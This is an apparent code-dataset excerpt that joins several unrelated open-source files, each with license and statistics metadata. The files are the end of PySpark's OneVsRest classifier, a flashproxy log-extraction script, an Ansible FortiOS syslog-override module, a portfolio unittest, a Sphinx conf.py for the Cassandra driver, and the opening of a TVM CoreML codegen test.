def setSolver(self, value):
"""
Sets the value of :py:attr:`solver`.
"""
return self._set(solver=value)
@since("2.0.0")
def getSolver(self):
"""
Gets the value of solver or its default value.
"""
return self.getOrDefault(self.solver)
@since("2.0.0")
def setInitialWeights(self, value):
"""
Sets the value of :py:attr:`initialWeights`.
"""
return self._set(initialWeights=value)
@since("2.0.0")
def getInitialWeights(self):
"""
Gets the value of initialWeights or its default value.
"""
return self.getOrDefault(self.initialWeights)
class MultilayerPerceptronClassificationModel(JavaModel, JavaPredictionModel, JavaMLWritable,
JavaMLReadable):
"""
Model fitted by MultilayerPerceptronClassifier.
.. versionadded:: 1.6.0
"""
@property
@since("1.6.0")
def layers(self):
"""
array of layer sizes including input and output layers.
"""
return self._call_java("javaLayers")
@property
@since("2.0.0")
def weights(self):
"""
the weights of layers.
"""
return self._call_java("weights")
class OneVsRestParams(HasFeaturesCol, HasLabelCol, HasPredictionCol):
"""
Parameters for OneVsRest and OneVsRestModel.
"""
classifier = Param(Params._dummy(), "classifier", "base binary classifier")
@since("2.0.0")
def setClassifier(self, value):
"""
Sets the value of :py:attr:`classifier`.
.. note:: Only LogisticRegression and NaiveBayes are supported now.
"""
return self._set(classifier=value)
@since("2.0.0")
def getClassifier(self):
"""
Gets the value of classifier or its default value.
"""
return self.getOrDefault(self.classifier)
@inherit_doc
class OneVsRest(Estimator, OneVsRestParams, MLReadable, MLWritable):
"""
.. note:: Experimental
Reduction of Multiclass Classification to Binary Classification.
Performs reduction using one against all strategy.
For a multiclass classification with k classes, train k models (one per class).
Each example is scored against all k models and the model with highest score
is picked to label the example.
>>> from pyspark.sql import Row
>>> from pyspark.ml.linalg import Vectors
>>> df = sc.parallelize([
... Row(label=0.0, features=Vectors.dense(1.0, 0.8)),
... Row(label=1.0, features=Vectors.sparse(2, [], [])),
... Row(label=2.0, features=Vectors.dense(0.5, 0.5))]).toDF()
>>> lr = LogisticRegression(maxIter=5, regParam=0.01)
>>> ovr = OneVsRest(classifier=lr)
>>> model = ovr.fit(df)
>>> [x.coefficients for x in model.models]
[DenseVector([3.3925, 1.8785]), DenseVector([-4.3016, -6.3163]), DenseVector([-4.5855, 6.1785])]
>>> [x.intercept for x in model.models]
[-3.64747..., 2.55078..., -1.10165...]
>>> test0 = sc.parallelize([Row(features=Vectors.dense(-1.0, 0.0))]).toDF()
>>> model.transform(test0).head().prediction
1.0
>>> test1 = sc.parallelize([Row(features=Vectors.sparse(2, [0], [1.0]))]).toDF()
>>> model.transform(test1).head().prediction
0.0
>>> test2 = sc.parallelize([Row(features=Vectors.dense(0.5, 0.4))]).toDF()
>>> model.transform(test2).head().prediction
2.0
.. versionadded:: 2.0.0
"""
@keyword_only
def __init__(self, featuresCol="features", labelCol="label", predictionCol="prediction",
classifier=None):
"""
__init__(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
classifier=None)
"""
super(OneVsRest, self).__init__()
kwargs = self.__init__._input_kwargs
self._set(**kwargs)
@keyword_only
@since("2.0.0")
def setParams(self, featuresCol=None, labelCol=None, predictionCol=None, classifier=None):
"""
setParams(self, featuresCol=None, labelCol=None, predictionCol=None, classifier=None):
Sets params for OneVsRest.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def _fit(self, dataset):
labelCol = self.getLabelCol()
featuresCol = self.getFeaturesCol()
predictionCol = self.getPredictionCol()
classifier = self.getClassifier()
assert isinstance(classifier, HasRawPredictionCol),\
"Classifier %s doesn't extend from HasRawPredictionCol." % type(classifier)
numClasses = int(dataset.agg({labelCol: "max"}).head()["max("+labelCol+")"]) + 1
multiclassLabeled = dataset.select(labelCol, featuresCol)
# persist if underlying dataset is not persistent.
handlePersistence = \
dataset.rdd.getStorageLevel() == StorageLevel(False, False, False, False)
if handlePersistence:
multiclassLabeled.persist(StorageLevel.MEMORY_AND_DISK)
def trainSingleClass(index):
binaryLabelCol = "mc2b$" + str(index)
trainingDataset = multiclassLabeled.withColumn(
binaryLabelCol,
when(multiclassLabeled[labelCol] == float(index), 1.0).otherwise(0.0))
paramMap = dict([(classifier.labelCol, binaryLabelCol),
(classifier.featuresCol, featuresCol),
(classifier.predictionCol, predictionCol)])
return classifier.fit(trainingDataset, paramMap)
# TODO: Parallel training for all classes.
models = [trainSingleClass(i) for i in range(numClasses)]
if handlePersistence:
multiclassLabeled.unpersist()
return self._copyValues(OneVsRestModel(models=models))
@since("2.0.0")
def copy(self, extra=None):
"""
Creates a copy of this instance with a randomly generated uid
and some extra params. This creates a deep copy of the embedded paramMap,
and copies the embedded and extra parameters over.
:param extra: Extra parameters to copy to the new instance
:return: Copy of this instance
"""
if extra is None:
extra = dict()
newOvr = Params.copy(self, extra)
if self.isSet(self.classifier):
newOvr.setClassifier(self.getClassifier().copy(extra))
return newOvr
@since("2.0.0")
def write(self):
"""Returns an MLWriter instance for this ML instance."""
return JavaMLWriter(self)
@since("2.0.0")
def save(self, path):
"""Save this ML instance to the given path, a shortcut of `write().save(path)`."""
self.write().save(path)
@classmethod
@since("2.0.0")
def read(cls):
"""Returns an MLReader instance for this class."""
return JavaMLReader(cls)
@classmethod
def _from_java(cls, java_stage):
"""
Given a Java OneVsRest, create and return a Python wrapper of it.
Used for ML persistence.
"""
featuresCol = java_stage.getFeaturesCol()
labelCol = java_stage.getLabelCol()
predictionCol = java_stage.getPredictionCol()
classifier = JavaParams._from_java(java_stage.getClassifier())
py_stage = cls(featuresCol=featuresCol, labelCol=labelCol, predictionCol=predictionCol,
classifier=classifier)
py_stage._resetUid(java_stage.uid())
return py_stage
def _to_java(self):
"""
Transfer this instance to a Java OneVsRest. Used for ML persistence.
:return: Java object equivalent to this instance.
"""
_java_obj = JavaParams._new_java_obj("org.apache.spark.ml.classification.OneVsRest",
self.uid)
_java_obj.setClassifier(self.getClassifier()._to_java())
_java_obj.setFeaturesCol(self.getFeaturesCol())
_java_obj.setLabelCol(self.getLabelCol())
_java_obj.setPredictionCol(self.getPredictionCol())
return _java_obj
class OneVsRestModel(Model, OneVsRestParams, MLReadable, MLWritable):
"""
.. note:: Experimental
Model fitted by OneVsRest.
This stores the models resulting from training k binary classifiers: one for each class.
Each example is scored against all k models, and the model with the highest score
is picked to label the example.
.. versionadded:: 2.0.0
"""
def __init__(self, models):
super(OneVsRestModel, self).__init__()
self.models = models
def _transform(self, dataset):
# determine the input columns: these need to be passed through
origCols = dataset.columns
# add an accumulator column to store predictions of all the models
accColName = "mbc$acc" + str(uuid.uuid4())
initUDF = udf(lambda _: [], ArrayType(DoubleType()))
newDataset = dataset.withColumn(accColName, initUDF(dataset[origCols[0]]))
# persist if underlying dataset is not persistent.
handlePersistence = \
dataset.rdd.getStorageLevel() == StorageLevel(False, False, False, False)
if handlePersistence:
newDataset.persist(StorageLevel.MEMORY_AND_DISK)
# update the accumulator column with the result of prediction of models
aggregatedDataset = newDataset
for index, model in enumerate(self.models):
rawPredictionCol = model._call_java("getRawPredictionCol")
columns = origCols + [rawPredictionCol, accColName]
# add temporary column to store intermediate scores and update
tmpColName = "mbc$tmp" + str(uuid.uuid4())
updateUDF = udf(
lambda predictions, prediction: predictions + [prediction.tolist()[1]],
ArrayType(DoubleType()))
transformedDataset = model.transform(aggregatedDataset).select(*columns)
updatedDataset = transformedDataset.withColumn(
tmpColName,
updateUDF(transformedDataset[accColName], transformedDataset[rawPredictionCol]))
newColumns = origCols + [tmpColName]
# switch out the intermediate column with the accumulator column
aggregatedDataset = updatedDataset\
.select(*newColumns).withColumnRenamed(tmpColName, accColName)
if handlePersistence:
newDataset.unpersist()
# output the index of the classifier with highest confidence as prediction
labelUDF = udf(
lambda predictions: float(max(enumerate(predictions), key=operator.itemgetter(1))[0]),
DoubleType())
# output label and label metadata as prediction
return aggregatedDataset.withColumn(
self.getPredictionCol(), labelUDF(aggregatedDataset[accColName])).drop(accColName)
@since("2.0.0")
def copy(self, extra=None):
"""
Creates a copy of this instance with a randomly generated uid
and some extra params. This creates a deep copy of the embedded paramMap,
and copies the embedded and extra parameters over.
:param extra: Extra parameters to copy to the new instance
:return: Copy of this instance
"""
if extra is None:
extra = dict()
newModel = Params.copy(self, extra)
newModel.models = [model.copy(extra) for model in self.models]
return newModel
@since("2.0.0")
def write(self):
"""Returns an MLWriter instance for this ML instance."""
return JavaMLWriter(self)
@since("2.0.0")
def save(self, path):
"""Save this ML instance to the given path, a shortcut of `write().save(path)`."""
self.write().save(path)
@classmethod
@since("2.0.0")
def read(cls):
"""Returns an MLReader instance for this class."""
return JavaMLReader(cls)
@classmethod
def _from_java(cls, java_stage):
"""
Given a Java OneVsRestModel, create and return a Python wrapper of it.
Used for ML persistence.
"""
featuresCol = java_stage.getFeaturesCol()
labelCol = java_stage.getLabelCol()
predictionCol = java_stage.getPredictionCol()
classifier = JavaParams._from_java(java_stage.getClassifier())
models = [JavaParams._from_java(model) for model in java_stage.models()]
py_stage = cls(models=models).setPredictionCol(predictionCol).setLabelCol(labelCol)\
.setFeaturesCol(featuresCol).setClassifier(classifier)
py_stage._resetUid(java_stage.uid())
return py_stage
def _to_java(self):
"""
Transfer this instance to a Java OneVsRestModel. Used for ML persistence.
:return: Java object equivalent to this instance.
"""
java_models = [model._to_java() for model in self.models]
_java_obj = JavaParams._new_java_obj("org.apache.spark.ml.classification.OneVsRestModel",
self.uid, java_models)
_java_obj.set("classifier", self.getClassifier()._to_java())
_java_obj.set("featuresCol", self.getFeaturesCol())
_java_obj.set("labelCol", self.getLabelCol())
_java_obj.set("predictionCol", self.getPredictionCol())
return _java_obj
if __name__ == "__main__":
import doctest
import pyspark.ml.classification
from pyspark.sql import SparkSession
globs = pyspark.ml.classification.__dict__.copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
spark = SparkSession.builder\
.master("local[2]")\
.appName("ml.classification tests")\
.getOrCreate()
sc = spark.sparkContext
globs['sc'] = sc
globs['spark'] = spark
import tempfile
temp_path = tempfile.mkdtemp()
globs['temp_path'] = temp_path
try:
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
spark.stop()
finally:
from shutil import rmtree
try:
rmtree(temp_path)
except OSError:
pass
if failure_count:
exit(-1)
| apache-2.0 | 5,156,803,246,546,186,000 | 37.694611 | 100 | 0.61874 | false |
arlolra/flashproxy | experiments/proxy-extract.py | 3 | 2497 | #!/usr/bin/env python
import datetime
import getopt
import re
import sys
def usage(f = sys.stdout):
print >> f, """\
Usage: %s [INPUTFILE]
Extract proxy connections from a facilitator log. Each output line is
date\tcount\n
where count is the approximate poll interval in effect at date.
-h, --help show this help.
""" % sys.argv[0]
opts, args = getopt.gnu_getopt(sys.argv[1:], "h", ["help"])
for o, a in opts:
if o == "-h" or o == "--help":
usage()
sys.exit()
if len(args) == 0:
input_file = sys.stdin
elif len(args) == 1:
input_file = open(args[0])
else:
usage()
sys.exit()
def timedelta_to_seconds(delta):
return delta.days * (24 * 60 * 60) + delta.seconds + delta.microseconds / 1000000.0
# commit 49de7bf689ee989997a1edbf2414a7bdbc2164f9
# Author: David Fifield <[email protected]>
# Date: Thu Jan 3 21:01:39 2013 -0800
#
# Bump poll interval from 10 s to 60 s.
#
# commit 69d429db12cedc90dac9ccefcace80c86af7eb51
# Author: David Fifield <[email protected]>
# Date: Tue Jan 15 14:02:02 2013 -0800
#
# Increase facilitator_poll_interval from 1 m to 10 m.
BEGIN_60S = datetime.datetime(2013, 1, 3, 21, 0, 0)
BEGIN_600S = datetime.datetime(2013, 1, 15, 14, 0, 0)
# Proxies refresh themselves once a day, so interpolate across a day when the
# polling interval historically changed.
def get_poll_interval(date):
if date < BEGIN_60S:
return 10
elif BEGIN_60S <= date < BEGIN_60S + datetime.timedelta(1):
return timedelta_to_seconds(date-BEGIN_60S) / timedelta_to_seconds(datetime.timedelta(1)) * (60-10) + 10
elif date < BEGIN_600S:
return 60
elif BEGIN_600S <= date < BEGIN_600S + datetime.timedelta(1):
return timedelta_to_seconds(date-BEGIN_600S) / timedelta_to_seconds(datetime.timedelta(1)) * (600-60) + 60
else:
return 600
prev_output = None
count = 0.0
for line in input_file:
m = re.match(r'^(\d+-\d+-\d+ \d+:\d+:\d+) proxy gets', line)
if not m:
continue
date_str, = m.groups()
date = datetime.datetime.strptime(date_str, "%Y-%m-%d %H:%M:%S")
count += get_poll_interval(date)
rounded_date = date.replace(minute=0, second=0, microsecond=0)
prev_output = prev_output or rounded_date
if prev_output is None or rounded_date != prev_output:
avg = float(count) / 10.0
print date.strftime("%Y-%m-%d %H:%M:%S") + "\t" + "%.2f" % avg
prev_output = rounded_date
count = 0.0
| mit | -4,201,470,982,416,928,000 | 29.45122 | 114 | 0.642371 | false |
h3biomed/ansible | lib/ansible/modules/network/fortios/fortios_log_syslogd_override_setting.py | 23 | 12526 | #!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# the lib use python logging can get it if the following is set in your
# Ansible config.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_log_syslogd_override_setting
short_description: Override settings for remote syslog server in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS by allowing the
user to set and modify log_syslogd feature and override_setting category.
Examples include all parameters and values need to be adjusted to datasources before usage.
Tested with FOS v6.0.2
version_added: "2.8"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate ip address.
required: true
username:
description:
- FortiOS or FortiGate username.
required: true
password:
description:
- FortiOS or FortiGate password.
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS
protocol
type: bool
default: true
log_syslogd_override_setting:
description:
- Override settings for remote syslog server.
default: null
suboptions:
certificate:
description:
- Certificate used to communicate with Syslog server. Source certificate.local.name.
custom-field-name:
description:
- Custom field name for CEF format logging.
suboptions:
custom:
description:
- Field custom name.
id:
description:
- Entry ID.
required: true
name:
description:
- Field name.
enc-algorithm:
description:
- Enable/disable reliable syslogging with TLS encryption.
choices:
- high-medium
- high
- low
- disable
facility:
description:
- Remote syslog facility.
choices:
- kernel
- user
- mail
- daemon
- auth
- syslog
- lpr
- news
- uucp
- cron
- authpriv
- ftp
- ntp
- audit
- alert
- clock
- local0
- local1
- local2
- local3
- local4
- local5
- local6
- local7
format:
description:
- Log format.
choices:
- default
- csv
- cef
mode:
description:
- Remote syslog logging over UDP/Reliable TCP.
choices:
- udp
- legacy-reliable
- reliable
override:
description:
- Enable/disable override syslog settings.
choices:
- enable
- disable
port:
description:
- Server listen port.
server:
description:
- Address of remote syslog server.
source-ip:
description:
- Source IP address of syslog.
status:
description:
- Enable/disable remote syslog logging.
choices:
- enable
- disable
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
tasks:
- name: Override settings for remote syslog server.
fortios_log_syslogd_override_setting:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
https: "False"
log_syslogd_override_setting:
certificate: "<your_own_value> (source certificate.local.name)"
custom-field-name:
-
custom: "<your_own_value>"
id: "6"
name: "default_name_7"
enc-algorithm: "high-medium"
facility: "kernel"
format: "default"
mode: "udp"
override: "enable"
port: "13"
server: "192.168.100.40"
source-ip: "84.230.14.43"
status: "enable"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "id"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
fos = None
def login(data):
host = data['host']
username = data['username']
password = data['password']
fos.debug('on')
if 'https' in data and not data['https']:
fos.https('off')
else:
fos.https('on')
fos.login(host, username, password)
def filter_log_syslogd_override_setting_data(json):
option_list = ['certificate', 'custom-field-name', 'enc-algorithm',
'facility', 'format', 'mode',
'override', 'port', 'server',
'source-ip', 'status']
dictionary = {}
for attribute in option_list:
if attribute in json and json[attribute] is not None:
dictionary[attribute] = json[attribute]
return dictionary
def flatten_multilists_attributes(data):
multilist_attrs = []
for attr in multilist_attrs:
try:
path = "data['" + "']['".join(elem for elem in attr) + "']"
current_val = eval(path)
flattened_val = ' '.join(elem for elem in current_val)
exec(path + '= flattened_val')
except BaseException:
pass
return data
def log_syslogd_override_setting(data, fos):
vdom = data['vdom']
log_syslogd_override_setting_data = data['log_syslogd_override_setting']
flattened_data = flatten_multilists_attributes(log_syslogd_override_setting_data)
filtered_data = filter_log_syslogd_override_setting_data(flattened_data)
return fos.set('log.syslogd',
'override-setting',
data=filtered_data,
vdom=vdom)
def fortios_log_syslogd(data, fos):
login(data)
if data['log_syslogd_override_setting']:
resp = log_syslogd_override_setting(data, fos)
fos.logout()
return not resp['status'] == "success", resp['status'] == "success", resp
def main():
fields = {
"host": {"required": True, "type": "str"},
"username": {"required": True, "type": "str"},
"password": {"required": False, "type": "str", "no_log": True},
"vdom": {"required": False, "type": "str", "default": "root"},
"https": {"required": False, "type": "bool", "default": True},
"log_syslogd_override_setting": {
"required": False, "type": "dict",
"options": {
"certificate": {"required": False, "type": "str"},
"custom-field-name": {"required": False, "type": "list",
"options": {
"custom": {"required": False, "type": "str"},
"id": {"required": True, "type": "int"},
"name": {"required": False, "type": "str"}
}},
"enc-algorithm": {"required": False, "type": "str",
"choices": ["high-medium", "high", "low",
"disable"]},
"facility": {"required": False, "type": "str",
"choices": ["kernel", "user", "mail",
"daemon", "auth", "syslog",
"lpr", "news", "uucp",
"cron", "authpriv", "ftp",
"ntp", "audit", "alert",
"clock", "local0", "local1",
"local2", "local3", "local4",
"local5", "local6", "local7"]},
"format": {"required": False, "type": "str",
"choices": ["default", "csv", "cef"]},
"mode": {"required": False, "type": "str",
"choices": ["udp", "legacy-reliable", "reliable"]},
"override": {"required": False, "type": "str",
"choices": ["enable", "disable"]},
"port": {"required": False, "type": "int"},
"server": {"required": False, "type": "str"},
"source-ip": {"required": False, "type": "str"},
"status": {"required": False, "type": "str",
"choices": ["enable", "disable"]}
}
}
}
module = AnsibleModule(argument_spec=fields,
supports_check_mode=False)
try:
from fortiosapi import FortiOSAPI
except ImportError:
module.fail_json(msg="fortiosapi module is required")
global fos
fos = FortiOSAPI()
is_error, has_changed, result = fortios_log_syslogd(module.params, fos)
if not is_error:
module.exit_json(changed=has_changed, meta=result)
else:
module.fail_json(msg="Error in repo", meta=result)
if __name__ == '__main__':
main()
| gpl-3.0 | 7,582,874,373,944,974,000 | 31.117949 | 104 | 0.509181 | false |
cmvandrevala/finance_scripts | tests/portfolio_creator/test_portfolio_creator.py | 1 | 4436 | import unittest
import json
from portfolio_creator.portfolio_creator import PortfolioCreator
class MockDataSource:
def get(self):
return json.dumps({"snapshots": [{"timestamp": "2017-01-02",
"institution": "John's Union",
"account": "Checking",
"owner": "Robert",
"investment": "CASHX",
"asset": True,
"value": 98066,
"asset_class": "Cash Equivalents",
"update_frequency": 12,
"open_date": None},
{"timestamp": "2017-10-25",
"institution": "Bob's Bank",
"account": "Credit Card",
"owner": "John",
"investment": "CASHX",
"asset": False,
"value": 100000,
"asset_class": "None",
"update_frequency": 22,
"open_date": "2000-11-12",
"term": "medium"},
{"timestamp": "2017-10-26",
"institution": "Sam's Bank",
"account": "Credit Card",
"owner": "John",
"investment": "CASHX",
"asset": False,
"value": 100000,
"update_frequency": 195,
"open_date": "2017-1-1",
"term": None}
]})
class PortfolioCreatorTestCase(unittest.TestCase):
def setUp(self):
self.portfolio = PortfolioCreator().create(MockDataSource())
def test_it_creates_a_portfolio(self):
self.assertAlmostEqual(self.portfolio.total_value(), -1019.34)
self.assertEqual(self.portfolio.percentages(), {"CASHX": 1.0})
self.assertEqual(self.portfolio.asset_classes(),
{'Annuities': 0.0, 'Cash Equivalents': 1.0, 'Commodities': 0.0, 'Equities': 0.0,
'Fixed Assets': 0.0, 'Fixed Income': 0.0, 'Real Estate': 0.0})
def test_it_assigns_the_correct_names_to_the_accounts(self):
accounts = self.portfolio.accounts
first_account = accounts[0]
self.assertEqual(first_account.name(), "Checking")
second_account = accounts[1]
self.assertEqual(second_account.name(), "Credit Card")
third_account = accounts[2]
self.assertEqual(third_account.name(), "Credit Card")
def test_it_assigns_the_correct_update_frequencies_to_the_accounts(self):
accounts = self.portfolio.accounts
first_account = accounts[0]
self.assertEqual(first_account.update_frequency(), 12)
second_account = accounts[1]
self.assertEqual(second_account.update_frequency(), 22)
third_account = accounts[2]
self.assertEqual(third_account.update_frequency(), 195)
def test_it_assigns_the_correct_open_dates_to_the_accounts(self):
accounts = self.portfolio.accounts
first_account = accounts[0]
self.assertEqual(first_account.open_date(), None)
second_account = accounts[1]
self.assertEqual(second_account.open_date(), "2000-11-12")
third_account = accounts[2]
self.assertEqual(third_account.open_date(), "2017-1-1")
def test_it_assigns_the_correct_terms_to_the_accounts(self):
accounts = self.portfolio.accounts
first_account = accounts[0]
self.assertEqual(first_account.term(), "none")
second_account = accounts[1]
self.assertEqual(second_account.term(), "medium")
third_account = accounts[2]
self.assertEqual(third_account.term(), "none")
if __name__ == '__main__':
unittest.main()
| mit | 3,293,467,591,836,899,000 | 47.217391 | 105 | 0.457845 | false |
stef1927/python-driver | docs/conf.py | 6 | 7188 | # -*- coding: utf-8 -*-
#
# Cassandra Driver documentation build configuration file, created by
# sphinx-quickstart on Mon Jul 1 11:40:09 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
import cassandra
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Cassandra Driver'
copyright = u'2013-2016 DataStax'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = cassandra.__version__
# The full version, including alpha/beta/rc tags.
release = cassandra.__version__
autodoc_member_order = 'bysource'
autoclass_content = 'both'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'custom'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['./themes']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'CassandraDriverdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'cassandra-driver.tex', u'Cassandra Driver Documentation', u'DataStax', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'cassandra-driver', u'Cassandra Driver Documentation',
[u'Tyler Hobbs'], 1)
]
| apache-2.0 | 4,259,747,190,828,340,700 | 31.672727 | 96 | 0.711603 | false |
dmlc/tvm | tests/python/contrib/test_coreml_codegen.py | 3 | 6157 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import numpy as np
import pytest
from unittest import mock
import tvm
from tvm import relay
from tvm.relay import transform
from tvm.contrib.target import coreml as _coreml
pytest.importorskip("coremltools")
def _has_xcode():
try:
tvm.contrib.xcode.xcrun([])
return True
except FileNotFoundError:
pass
return False
def _create_graph():
shape = (10, 10)
mod = tvm.IRModule()
x = relay.var("x", shape=shape)
y = relay.var("y", shape=shape)
z = x + x
p = y * y
func = relay.Function([x, y], p - z)
mod["main"] = func
return mod
def _create_graph_annotated():
shape = (10, 10)
target = "coremlcompiler"
mod = tvm.IRModule()
# function 0
f0_i0 = relay.var(target + "_0_i0", shape=shape)
func0 = relay.Function([f0_i0], f0_i0 * f0_i0)
func0 = func0.with_attr("Primitive", tvm.tir.IntImm("int32", 1))
func0 = func0.with_attr("Inline", tvm.tir.IntImm("int32", 1))
func0 = func0.with_attr("Compiler", target)
func0 = func0.with_attr("global_symbol", target + "_0")
gv0 = relay.GlobalVar(target + "_0")
mod[gv0] = func0
# function 2
f2_i0 = relay.var(target + "_2_i0", shape=shape)
func2 = relay.Function([f2_i0], f2_i0 + f2_i0)
func2 = func2.with_attr("Primitive", tvm.tir.IntImm("int32", 1))
func2 = func2.with_attr("Inline", tvm.tir.IntImm("int32", 1))
func2 = func2.with_attr("Compiler", target)
func2 = func2.with_attr("global_symbol", target + "_2")
gv2 = relay.GlobalVar(target + "_2")
mod[gv2] = func2
